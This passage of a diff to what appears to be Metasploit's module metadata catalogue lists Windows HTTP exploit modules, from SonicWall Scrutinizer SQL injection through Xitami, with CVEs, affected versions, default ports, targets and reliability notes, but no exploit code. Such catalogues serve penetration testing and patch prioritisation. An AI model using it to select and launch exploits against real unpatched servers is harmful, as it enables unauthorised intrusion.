Please note that authentication is NOT needed\n to exploit this vulnerability.", + "references": [ + "CVE-2012-2962", + "OSVDB-84232", + "EDB-20033", + "BID-54625", + "URL-http://www.sonicwall.com/shared/download/Dell_SonicWALL_Scrutinizer_Service_Bulletin_for_SQL_injection_vulnerability_CVE.pdf" + ], + "platform": "PHP", + "arch": "php", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Dell SonicWall Scrutinizer 9.5.1 or older" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb", + "is_install_path": true, + "ref_name": "windows/http/sonicwall_scrutinizer_sqli", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ssrs_navcorrector_viewstate": { + "name": "SQL Server Reporting Services (SSRS) ViewState Deserialization", + "fullname": "exploit/windows/http/ssrs_navcorrector_viewstate", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-02-11", + "type": "exploit", + "author": [ + "Soroush Dalili", + "Spencer McIntyre" + ], + "description": "A vulnerability exists within Microsoft's SQL Server Reporting Services\n which can allow an attacker to craft an HTTP POST request with a\n serialized object to achieve remote code execution. 
The vulnerability is\n due to the fact that the serialized blob is not signed by the server.", + "references": [ + "CVE-2020-0618", + "URL-https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows (x86)", + "Windows (x64)", + "Windows (cmd)" + ], + "mod_time": "2021-08-27 17:15:33 +0000", + "path": "/modules/exploits/windows/http/ssrs_navcorrector_viewstate.rb", + "is_install_path": true, + "ref_name": "windows/http/ssrs_navcorrector_viewstate", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/steamcast_useragent": { + "name": "Streamcast HTTP User-Agent Buffer Overflow", + "fullname": "exploit/windows/http/steamcast_useragent", + "aliases": [], + "rank": 200, + "disclosure_date": "2008-01-24", + "type": "exploit", + "author": [ + "LSO ", + "aushack " + ], + "description": "This module exploits a stack buffer overflow in Streamcast <= 0.9.75. 
By sending\n an overly long User-Agent in an HTTP GET request, an attacker may be able to\n execute arbitrary code.", + "references": [ + "CVE-2008-0550", + "OSVDB-42670", + "URL-http://aluigi.altervista.org/adv/steamcazz-adv.txt", + "BID-33898" + ], + "platform": "Windows", + "arch": "", + "rport": 8000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro English All", + "Windows XP Pro SP0/SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/steamcast_useragent.rb", + "is_install_path": true, + "ref_name": "windows/http/steamcast_useragent", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/sws_connection_bof": { + "name": "Simple Web Server Connection Header Buffer Overflow", + "fullname": "exploit/windows/http/sws_connection_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-07-20", + "type": "exploit", + "author": [ + "mr.pr0n", + "juan vazquez " + ], + "description": "This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user\n can send a long string data in the Connection Header to causes an overflow on the\n stack when function vsprintf() is used, and gain arbitrary code execution. 
The\n module has been tested successfully on Windows 7 SP1 and Windows XP SP3.", + "references": [ + "OSVDB-84310", + "EDB-19937", + "URL-http://ghostinthelab.wordpress.com/2012/07/19/simplewebserver-2-2-rc2-remote-buffer-overflow-exploit/" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "SimpleWebServer 2.2-rc2 / Windows XP SP3 / Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/sws_connection_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/sws_connection_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/sybase_easerver": { + "name": "Sybase EAServer 5.2 Remote Stack Buffer Overflow", + "fullname": "exploit/windows/http/sybase_easerver", + "aliases": [], + "rank": 200, + "disclosure_date": "2005-07-25", + "type": "exploit", + "author": [ + "Unknown" + ], + "description": "This module exploits a stack buffer overflow in the Sybase EAServer Web\n Console. 
The offset to the SEH frame appears to change depending\n on what version of Java is in use by the remote server, making this\n exploit somewhat unreliable.", + "references": [ + "CVE-2005-2297", + "OSVDB-17996", + "BID-14287" + ], + "platform": "Windows", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "Windows All - Sybase EAServer 5.2 - jdk 1.3.1_11", + "Windows All - Sybase EAServer 5.2 - jdk 1.3.?.?", + "Windows All - Sybase EAServer 5.2 - jdk 1.4.2_06", + "Windows All - Sybase EAServer 5.2 - jdk 1.4.1_02" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/sybase_easerver.rb", + "is_install_path": true, + "ref_name": "windows/http/sybase_easerver", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/syncbreeze_bof": { + "name": "Sync Breeze Enterprise GET Buffer Overflow", + "fullname": "exploit/windows/http/syncbreeze_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2017-03-15", + "type": "exploit", + "author": [ + "Daniel Teixeira", + "Andrew Smith", + "Owais Mehtab", + "Milton Valencia (wetw0rk)" + ], + "description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of Sync Breeze Enterprise v9.4.28, v10.0.28,\n and v10.1.16, caused by improper bounds checking of the request in\n HTTP GET and POST requests sent to the built-in web server. 
This\n module has been tested successfully on Windows 7 SP1 x86.", + "references": [ + "CVE-2017-14980" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "Sync Breeze Enterprise v9.4.28", + "Sync Breeze Enterprise v10.0.28", + "Sync Breeze Enterprise v10.1.16" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/syncbreeze_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/syncbreeze_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/sysax_create_folder": { + "name": "Sysax Multi Server 5.64 Create Folder Buffer Overflow", + "fullname": "exploit/windows/http/sysax_create_folder", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-07-29", + "type": "exploit", + "author": [ + "Craig Freyman", + "Matt \"hostess\" Andreko" + ], + "description": "This module exploits a stack buffer overflow in the create folder function in\n Sysax Multi Server 5.64. This issue was fixed in 5.66. In order to trigger the\n vulnerability valid credentials with the create folder permission must be provided.\n The HTTP option must be enabled on Sysax too.\n\n This module will log into the server, get a SID token, find the root folder, and\n then proceed to exploit the server. 
Successful exploits result in SYSTEM access.\n This exploit works on XP SP3, and Server 2003 SP1-SP2.", + "references": [ + "CVE-2012-6530", + "OSVDB-82329", + "EDB-20676", + "EDB-18420", + "URL-http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html", + "URL-http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows XP SP3 / Sysax Multi Server 5.64", + "Windows 2003 SP1-SP2 / Sysax Multi Server 5.64" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/sysax_create_folder.rb", + "is_install_path": true, + "ref_name": "windows/http/sysax_create_folder", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/telerik_rau_deserialization": { + "name": "Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization", + "fullname": "exploit/windows/http/telerik_rau_deserialization", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-12-09", + "type": "exploit", + "author": [ + "Spencer McIntyre", + "Paul Taylor", + "Markus Wulftange", + "Caleb Gross", + "Alvaro Muñoz", + "Oleksandr Mirosh", + "straightblast" + ], + "description": "This module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik\n UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET\n assembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the\n cryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once\n patched randomizes these keys. 
It is also necessary to know the version of Telerik UI ASP.NET that is running.\n This version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. '2020.3.915').", + "references": [ + "CVE-2017-11317", + "URL-https://github.com/bao7uo/RAU_crypto", + "URL-https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload", + "URL-https://github.com/straightblast/UnRadAsyncUpload/wiki", + "CVE-2019-18935", + "URL-https://github.com/noperator/CVE-2019-18935", + "URL-https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization", + "URL-https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html", + "URL-https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows" + ], + "mod_time": "2021-02-24 20:24:57 +0000", + "path": "/modules/exploits/windows/http/telerik_rau_deserialization.rb", + "is_install_path": true, + "ref_name": "windows/http/telerik_rau_deserialization", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [ + "unreliable-session" + ], + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/telerik_report_server_deserialization": { + "name": "Telerik Report Server Auth Bypass and Deserialization RCE", + "fullname": "exploit/windows/http/telerik_report_server_deserialization", + "aliases": [], + "rank": 600, + "disclosure_date": "2024-06-04", + "type": "exploit", + "author": [ + "SinSinology", + "Soroush Dalili", + "Unknown", + "Spencer McIntyre" + ], + "description": "This module chains an authentication bypass 
vulnerability (CVE-2024-4358) with a deserialization vulnerability\n (CVE-2024-1800) to obtain remote code execution against Telerik Report Server version 10.0.24.130 and prior.\n The authentication bypass flaw allows an unauthenticated user to create a new user with administrative privileges.\n The USERNAME datastore option can be used to authenticate with an existing account to prevent the creation of a\n new one. The deserialization flaw works by uploading a specially crafted report that when loaded will execute an\n OS command as NT AUTHORITY\\SYSTEM. The module will automatically delete the created report but not the account\n because users are unable to delete themselves.", + "references": [ + "CVE-2024-1800", + "CVE-2024-4358", + "URL-https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 83, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2024-06-06 14:56:33 +0000", + "path": "/modules/exploits/windows/http/telerik_report_server_deserialization.rb", + "is_install_path": true, + "ref_name": "windows/http/telerik_report_server_deserialization", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ], + "RelatedModules": [ + "auxiliary/scanner/http/telerik_report_server_auth_bypass" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/tomcat_cgi_cmdlineargs": { + "name": "Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability", + "fullname": "exploit/windows/http/tomcat_cgi_cmdlineargs", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-04-10", + "type": "exploit", + "author": [ + "Yakov Shafranovich", + 
"sinn3r " + ], + "description": "This module exploits a vulnerability in Apache Tomcat's CGIServlet component. When the\n enableCmdLineArguments setting is set to true, a remote user can abuse this to execute\n system commands, and gain remote code execution.", + "references": [ + "CVE-2019-0232", + "URL-https://wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232/", + "URL-https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Apache Tomcat 9.0 or prior for Windows" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/tomcat_cgi_cmdlineargs.rb", + "is_install_path": true, + "ref_name": "windows/http/tomcat_cgi_cmdlineargs", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ], + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-safe" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/trackercam_phparg_overflow": { + "name": "TrackerCam PHP Argument Buffer Overflow", + "fullname": "exploit/windows/http/trackercam_phparg_overflow", + "aliases": [], + "rank": 200, + "disclosure_date": "2005-02-18", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a simple stack buffer overflow in the\n TrackerCam web server. All current versions of this software\n are vulnerable to a large number of security issues. 
This\n module abuses the directory traversal flaw to gain\n information about the system and then uses the PHP overflow\n to execute arbitrary code.", + "references": [ + "CVE-2005-0478", + "OSVDB-13953", + "OSVDB-13955", + "BID-12592", + "URL-http://aluigi.altervista.org/adv/tcambof-adv.txt" + ], + "platform": "Windows", + "arch": "", + "rport": 8090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows 2000 English", + "Windows XP English SP0/SP1", + "Windows NT 4.0 SP4/SP5/SP6" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/trackercam_phparg_overflow.rb", + "is_install_path": true, + "ref_name": "windows/http/trackercam_phparg_overflow", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/trackit_file_upload": { + "name": "Numara / BMC Track-It! FileStorageService Arbitrary File Upload", + "fullname": "exploit/windows/http/trackit_file_upload", + "aliases": [], + "rank": 600, + "disclosure_date": "2014-10-07", + "type": "exploit", + "author": [ + "Pedro Ribeiro " + ], + "description": "This module exploits an arbitrary file upload vulnerability in Numara / BMC Track-It!\n v8 to v11.X.\n The application exposes the FileStorageService .NET remoting service on port 9010\n (9004 for version 8) which accepts unauthenticated uploads. 
This can be abused by\n a malicious user to upload a ASP or ASPX file to the web root leading to arbitrary\n code execution as NETWORK SERVICE or SYSTEM.\n This module has been tested successfully on versions 11.3.0.355, 10.0.51.135, 10.0.50.107,\n 10.0.0.143, 9.0.30.248 and 8.0.2.51.", + "references": [ + "CVE-2014-4872", + "OSVDB-112741", + "US-CERT-VU-121036", + "URL-https://seclists.org/fulldisclosure/2014/Oct/34" + ], + "platform": "Windows", + "arch": "x86", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Numara / BMC Track-It! v9 to v11.X - Windows" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/trackit_file_upload.rb", + "is_install_path": true, + "ref_name": "windows/http/trackit_file_upload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/trendmicro_officescan": { + "name": "Trend Micro OfficeScan Remote Stack Buffer Overflow", + "fullname": "exploit/windows/http/trendmicro_officescan", + "aliases": [], + "rank": 400, + "disclosure_date": "2007-06-28", + "type": "exploit", + "author": [ + "toto" + ], + "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan\n cgiChkMasterPwd.exe (running with SYSTEM privileges).", + "references": [ + "CVE-2008-1365", + "OSVDB-42499" + ], + "platform": "Windows", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows 2000 - Trend Micro OfficeScan 7.3.0.1293)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/trendmicro_officescan.rb", + "is_install_path": true, + "ref_name": "windows/http/trendmicro_officescan", + 
"check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/trendmicro_officescan_widget_exec": { + "name": "Trend Micro OfficeScan Remote Code Execution", + "fullname": "exploit/windows/http/trendmicro_officescan_widget_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2017-10-07", + "type": "exploit", + "author": [ + "mr_me ", + "Mehmet Ince " + ], + "description": "This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a\n terminal command under the context of the web server user.\n\n The specific flaw exists within the management interface, which listens on TCP port 443 by default. The Trend Micro Officescan product\n has a widget feature which is implemented with PHP. Talker.php takes ack and hash parameters but doesn't validate these values, which\n leads to an authentication bypass for the widget. Proxy.php files under the mod TMCSS folder take multiple parameters but the process\n does not properly validate a user-supplied string before using it to execute a system call. 
Due to combination of these vulnerabilities,\n unauthenticated users can execute a terminal command under the context of the web server user.", + "references": [ + "CVE-2017-11394", + "URL-https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/", + "URL-http://www.zerodayinitiative.com/advisories/ZDI-17-521/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Targeting", + "OfficeScan 11", + "OfficeScan XG" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/trendmicro_officescan_widget_exec.rb", + "is_install_path": true, + "ref_name": "windows/http/trendmicro_officescan_widget_exec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ultraminihttp_bof": { + "name": "Ultra Mini HTTPD Stack Buffer Overflow", + "fullname": "exploit/windows/http/ultraminihttp_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-07-10", + "type": "exploit", + "author": [ + "superkojiman", + "PsychoSpy ", + "OJ Reeves " + ], + "description": "This module exploits a stack based buffer overflow in Ultra Mini HTTPD 1.21,\n allowing remote attackers to execute arbitrary code via a long resource name in an HTTP\n request. This exploit has to deal with the fact that the application's request handler\n thread is terminated after 60 seconds by a \"monitor\" thread. To do this, it allocates\n some RWX memory, copies the payload to it and creates another thread. 
When done, it\n terminates the current thread so that it doesn't crash and hence doesn't bring down\n the process with it.", + "references": [ + "OSVDB-95164", + "EDB-26739", + "CVE-2013-5019", + "BID-61130" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "v1.21 - Windows Server 2000", + "v1.21 - Windows XP SP0", + "v1.21 - Windows XP SP2/SP3", + "v1.21 - Windows Server 2003 (Enterprise)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/ultraminihttp_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/ultraminihttp_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/umbraco_upload_aspx": { + "name": "Umbraco CMS Remote Command Execution", + "fullname": "exploit/windows/http/umbraco_upload_aspx", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-06-28", + "type": "exploit", + "author": [ + "Toby Clarke", + "juan vazquez " + ], + "description": "This module can be used to execute a payload on Umbraco CMS 4.7.0.378.\n The payload is uploaded as an ASPX script by sending a specially crafted\n SOAP request to codeEditorSave.asmx, which permits unauthorized file upload\n via the SaveDLRScript operation. SaveDLRScript is also subject to a path\n traversal vulnerability, allowing code to be placed into the web-accessible\n /umbraco/ directory.\n\n The module writes, executes and then overwrites an ASPX script; note that\n though the script content is removed, the file remains on the target. Automatic\n cleanup of the file is intended if a meterpreter payload is used.\n\n This module has been tested successfully on Umbraco CMS 4.7.0.378 on a Windows\n 7 32-bit SP1. 
In this scenario, the \"IIS APPPOOL\\ASP.NET v4.0\" user must have\n write permissions on the Windows Temp folder.", + "references": [ + "OSVDB-83765", + "EDB-19671", + "URL-http://blog.gdssecurity.com/labs/2012/7/3/find-bugs-faster-with-a-webmatrix-local-reference-instance.html", + "URL-http://umbraco.codeplex.com/workitem/18192" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Umbraco CMS 4.7.0.378 / Microsoft Windows 7 Professional 32-bit SP1" + ], + "mod_time": "2019-08-02 09:48:53 +0000", + "path": "/modules/exploits/windows/http/umbraco_upload_aspx.rb", + "is_install_path": true, + "ref_name": "windows/http/umbraco_upload_aspx", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/vmware_vcenter_chargeback_upload": { + "name": "VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload", + "fullname": "exploit/windows/http/vmware_vcenter_chargeback_upload", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-05-15", + "type": "exploit", + "author": [ + "Andrea Micalizzi", + "juan vazquez " + ], + "description": "This module exploits a code execution flaw in VMware vCenter Chargeback Manager,\n where the ImageUploadServlet servlet allows unauthenticated file upload. 
The files\n are uploaded to the /cbmui/images/ web path, where JSP code execution is allowed.\n The module has been tested successfully on VMware vCenter Chargeback Manager 2.0.1\n on Windows 2003 SP2.", + "references": [ + "CVE-2013-3520", + "OSVDB-94188", + "BID-60484", + "ZDI-13-147" + ], + "platform": "Windows", + "arch": "x86", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "VMware vCenter Chargeback Manager 2.0.1 / Windows 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb", + "is_install_path": true, + "ref_name": "windows/http/vmware_vcenter_chargeback_upload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/vxsrchs_bof": { + "name": "VX Search Enterprise GET Buffer Overflow", + "fullname": "exploit/windows/http/vxsrchs_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2017-03-15", + "type": "exploit", + "author": [ + "Daniel Teixeira" + ], + "description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of VX Search Enterprise v9.5.12, caused by\n improper bounds checking of the request path in HTTP GET requests\n sent to the built-in web server. 
This module has been tested\n successfully on Windows 7 SP1 x86.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "VX Search Enterprise v9.5.12" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/vxsrchs_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/vxsrchs_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/webster_http": { + "name": "Webster HTTP Server GET Buffer Overflow", + "fullname": "exploit/windows/http/webster_http", + "aliases": [], + "rank": 200, + "disclosure_date": "2002-12-02", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This exploits a stack buffer overflow in the Webster HTTP server.\n The server and source code was released within an article from\n the Microsoft Systems Journal in February 1996 titled \"Write a\n Simple HTTP-based Server Using MFC and Windows Sockets\".", + "references": [ + "CVE-2002-2268", + "OSVDB-44106", + "BID-6289", + "URL-http://www.microsoft.com/msj/archive/s25f.aspx", + "URL-http://www.netdave.com/webster/webster.htm" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows XP SP0", + "Debug" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/webster_http.rb", + "is_install_path": true, + "ref_name": "windows/http/webster_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ws_ftp_rce_cve_2023_40044": { + 
"name": "Progress Software WS_FTP Unauthenticated Remote Code Execution", + "fullname": "exploit/windows/http/ws_ftp_rce_cve_2023_40044", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-09-27", + "type": "exploit", + "author": [ + "sfewer-r7" + ], + "description": "This module exploits an unsafe .NET deserialization vulnerability to achieve unauthenticated remote code\n execution against a vulnerable WS_FTP server running the Ad Hoc Transfer module. All versions of WS_FTP Server\n prior to 2020.0.4 (version 8.7.4) and 2022.0.2 (version 8.8.2) are vulnerable to this issue. The vulnerability\n was originally discovered by AssetNote.", + "references": [ + "CVE-2023-40044", + "URL-https://attackerkb.com/topics/bn32f9sNax/cve-2023-40044/rapid7-analysis", + "URL-https://community.progress.com/s/article/WS-FTP-Server-Critical-Vulnerability-September-2023", + "URL-https://www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows" + ], + "mod_time": "2023-10-04 09:39:25 +0000", + "path": "/modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb", + "is_install_path": true, + "ref_name": "windows/http/ws_ftp_rce_cve_2023_40044", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/xampp_webdav_upload_php": { + "name": "XAMPP WebDAV PHP Upload", + "fullname": "exploit/windows/http/xampp_webdav_upload_php", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-01-14", + "type": "exploit", + "author": [ + "theLightCosine " + ], + "description": 
"This module exploits weak WebDAV passwords on XAMPP servers.\n It uses supplied credentials to upload a PHP payload and\n execute it.", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2018-08-20 18:08:19 +0000", + "path": "/modules/exploits/windows/http/xampp_webdav_upload_php.rb", + "is_install_path": true, + "ref_name": "windows/http/xampp_webdav_upload_php", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/xitami_if_mod_since": { + "name": "Xitami 2.5c2 Web Server If-Modified-Since Overflow", + "fullname": "exploit/windows/http/xitami_if_mod_since", + "aliases": [], + "rank": 200, + "disclosure_date": "2007-09-24", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a stack buffer overflow in the iMatix Corporation\n Xitami Web Server. If a malicious user sends an\tIf-Modified-Since\n header containing an overly long string, it may be possible to\n execute a payload remotely. 
